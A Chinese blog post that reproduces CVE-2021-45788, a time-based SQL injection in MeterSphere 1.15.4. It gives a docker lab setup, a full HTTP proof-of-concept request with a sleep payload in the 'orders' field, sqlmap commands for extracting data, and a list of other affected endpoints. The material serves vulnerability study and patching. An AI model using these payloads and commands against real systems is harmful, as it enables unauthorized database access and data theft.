当前位置: 首页 > article >正文

【漏洞复现】CVE-2021-45788 SQL Injection

漏洞信息

NVD - cve-2021-45788

Time-based SQL Injection vulnerabilities were found in Metersphere v1.15.4 via the “orders” parameter.

Authenticated users can control the parameters in the “order by” statement, which causing SQL injection.

API: /test/case/list/{goPage}/{pageSize}

背景介绍

MeterSphere is an open-source, continuous testing platform widely used by developers and QA managers for test plan management, data-driven testing, and test reporting metrics. It is engineered to integrate seamlessly with a variety of development and CI/CD toolchains to enhance productivity in DevOps environments. The platform supports functional UI, performance, and API testing, aiming to optimize testing workflows. The primary users of MeterSphere are software development teams and testing specialists seeking to attain high-quality assurance in their product cycles. Its robust plug-in architecture allows it to be extended and customized for specific workflows and tool integrations, making it adaptable across different industry requirements.

主页:https://metersphere.io/

源码:https://github.com/metersphere/metersphere

环境搭建

docker-compose.yml

version: "2.1"
services:
  web:
    image: vulhub/metersphere:1.15.4
    ports:
      - "8081:8081"
      - "5005:5005"
    environment:
      MYSQL_SERVER: db:3306
      MYSQL_DB: metersphere
      MYSQL_USERNAME: root
      MYSQL_PASSWORD: root
      KAFKA_SERVER: kafka:9092
  db:
    image: mysql:5.7
    command: --sql-mode="STRICT_TRANS_TABLES,NO_ZERO_IN_DATE,NO_ZERO_DATE,ERROR_FOR_DIVISION_BY_ZERO,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTITUTION" --max-connections=8000
    environment:
    - MYSQL_ROOT_PASSWORD=root
    - MYSQL_DATABASE=metersphere
  kafka:
    image: bitnami/kafka:3.4.1
    environment:
      # KRaft settings
      - KAFKA_CFG_NODE_ID=0
      - KAFKA_CFG_PROCESS_ROLES=controller,broker
      - KAFKA_CFG_CONTROLLER_QUORUM_VOTERS=0@kafka:9093
      # Listeners
      - KAFKA_CFG_LISTENERS=PLAINTEXT://:9092,CONTROLLER://:9093
      - KAFKA_CFG_ADVERTISED_LISTENERS=PLAINTEXT://:9092
      - KAFKA_CFG_LISTENER_SECURITY_PROTOCOL_MAP=CONTROLLER:PLAINTEXT,PLAINTEXT:PLAINTEXT
      - KAFKA_CFG_CONTROLLER_LISTENER_NAMES=CONTROLLER
      - KAFKA_CFG_INTER_BROKER_LISTENER_NAME=PLAINTEXT

Web UI:http://127.0.0.1:8081

在这里插入图片描述

账号admin、密码metersphere

漏洞复现

参考: [BUG]Time-based SQL Injetion in v1.15.4 · Issue #8651 · metersphere/metersphere

登录Web UI后进入http://127.0.0.1:8081/#/track/case/all创建新的测试用例:

在这里插入图片描述

POC:

POST /test/case/list/1/10 HTTP/1.1
Host: localhost.lan:8081
Content-Length: 3149
Accept: application/json, text/plain, */*
CSRF-TOKEN: fXx2lJHlPYUA1mmtPn69Bhxtx7UVXEz676ScrXnOlFyUcUPQ0hrM9pjbe4U23MDLdURgu8bAJTZdIdVUYsbaOg==
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json
Accept-Encoding: gzip, deflate, br
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8,en-US;q=0.7
Cookie: Hm_lvt_5819d05c0869771ff6e6a81cdec5b2e8=1733898529; skinName=skin-blue3; pageNo=1; pageSize=20; MS_SESSION_ID=2aad45b5-a17a-4a02-8e5d-0321805852d0
Connection: close
{"orders":[{"name":"name","type":",if(1=1,sleep(10),sleep(0))"}],"components":[{"key":"name","name":"MsTableSearchInput","label":"commons.name","operator":{"value":"like","options":[{"label":"commons.adv_search.operators.like","value":"like"},{"label":"commons.adv_search.operators.not_like","value":"not like"}]}},{"key":"tags","name":"MsTableSearchInput","label":"commons.tag","operator":{"value":"like","options":[{"label":"commons.adv_search.operators.like","value":"like"},{"label":"commons.adv_search.operators.not_like","value":"not like"}]}},{"key":"module","name":"MsTableSearchInput","label":"test_track.case.module","operator":{"value":"like","options":[{"label":"commons.adv_search.operators.like","value":"like"},{"label":"commons.adv_search.operators.not_like","value":"not like"}]}},{"key":"priority","name":"MsTableSearchSelect","label":"test_track.case.priority","operator":{"options":[{"label":"commons.adv_search.operators.in","value":"in"},{"label":"commons.adv_search.operators.not_in","value":"not in"}]},"options":[{"label":"P0","value":"P0"},{"label":"P1","value":"P1"},{"label":"P2","value":"P2"},{"label":"P3","value":"P3"}],"props":{"multiple":true}},{"key":"createTime","name":"MsTableSearchDateTimePicker","label":"commons.create_time","operator":{"options":[{"label":"commons.adv_search.operators.between","value":"between"},{"label":"commons.adv_search.operators.gt","value":"gt"},{"label":"commons.adv_search.operators.ge","value":"ge"},{"label":"commons.adv_search.operators.lt","value":"lt"},{"label":"commons.adv_search.operators.le","value":"le"},{"label":"commons.adv_search.operators.equals","value":"eq"}]}},{"key":"updateTime","name":"MsTableSearchDateTimePicker","label":"commons.update_time","operator":{"options":[{"label":"commons.adv_search.operators.between","value":"between"},{"label":"commons.adv_search.operators.gt","value":"gt"},{"label":"commons.adv_search.operators.ge","value":"ge"},{"label":"commons.adv_search.operators.lt","value":"lt"},{"label":"commons.adv_search.operators.le","value":"le"},{"label":"commons.adv_search.operators.equals","value":"eq"}]}},{"key":"creator","name":"MsTableSearchSelect","label":"api_test.creator","operator":{"options":[{"label":"commons.adv_search.operators.in","value":"in"},{"label":"commons.adv_search.operators.not_in","value":"not in"},{"label":"commons.adv_search.operators.current_user","value":"current user"}]},"options":{"url":"/user/list","labelKey":"name","valueKey":"id"},"props":{"multiple":true}},{"key":"reviewStatus","name":"MsTableSearchSelect","label":"test_track.review_view.execute_result","operator":{"options":[{"label":"commons.adv_search.operators.in","value":"in"},{"label":"commons.adv_search.operators.not_in","value":"not in"}]},"options":[{"label":"test_track.review.prepare","value":"Prepare"},{"label":"test_track.review.pass","value":"Pass"},{"label":"test_track.review.un_pass","value":"UnPass"}],"props":{"multiple":true}}],"filters":{"reviewStatus":["Prepare","Pass","UnPass"]},"planId":"","nodeIds":[],"selectAll":false,"unSelectIds":[],"selectThisWeedData":false,"selectThisWeedRelevanceData":false,"caseCoverage":null}

if分支执行:

在这里插入图片描述

else分支执行:

在这里插入图片描述

基于此可以验证存在时间盲注,通过sqlmap或者自己写爆破脚本实现漏洞利用:

python sqlmap.py -r req.txt --dbms mysql --technique T --prefix , --level 3
python sqlmap.py -r req.txt --dbms mysql --technique T --prefix , --level 3 --current-user

此外,这个漏洞还存在于很多其他接口:

/test/plan/case/list/all
/test/plan/case/list/ids
/issues/list/{goPage}/{pageSize}
/test/case/list/{goPage}/{pageSize}

漏洞分析

漏洞source位于backend/src/main/java/io/metersphere/track/service/TestPlanTestCaseService.java:

在这里插入图片描述

漏洞sink位于backend/src/main/java/io/metersphere/base/mapper/ext/ExtTestPlanTestCaseMapper.xml:

在这里插入图片描述


http://www.kler.cn/a/450266.html

相关文章:

  • 灵当CRM getMyAmbassador Sql注入漏洞复现(附脚本)
  • 【C++】B2066救援题目分析和解决讲解
  • JAVA HTTP压缩数据
  • 京东零售数据可视化平台产品实践与思考
  • windows下安装配置anaconda及常用的conda命令
  • 【蓝桥杯——物联网设计与开发】基础模块8 - RTC
  • Ansible 批量管理华为 CE 交换机
  • 高性能卡尺找圆工具
  • http反向代理
  • ubuntu22.04安装PaddleX3
  • PyCharm专业版安装和学生认证教程
  • 没想到互联网大厂都喜欢问MySQL中的数据类型?
  • 《开启微服务之旅:Spring Boot Web开发》(三)
  • Nginx与Tomcat之间的关系
  • Python高性能web框架-FastApi教程:(10)Request对象
  • unity 选择图片点击确定保存,取消则不保存
  • 浅显易懂地介绍 llm.c [译]
  • C++设计模式:中介者模式(聊天室系统)
  • 线性控制算法与非线性控制算法阐述与区分
  • 谷歌浏览器“你使用的是不受支持的命令行标志:--no-sandbox。这会带来稳定性和安全风险。”解决方法
  • NestJS中使用DynamicModule构建插件系统
  • EasyGBS国标GB28181公网平台P2P远程访问故障诊断:云端服务端排查指南
  • 微服务——技术选型与框架
  • PingCAP TiDB数据库专员PCTA认证笔记
  • 【杂谈】-为什么Python是AI的首选语言
  • C# winform 字符串通过枚举类型转成int类型的数据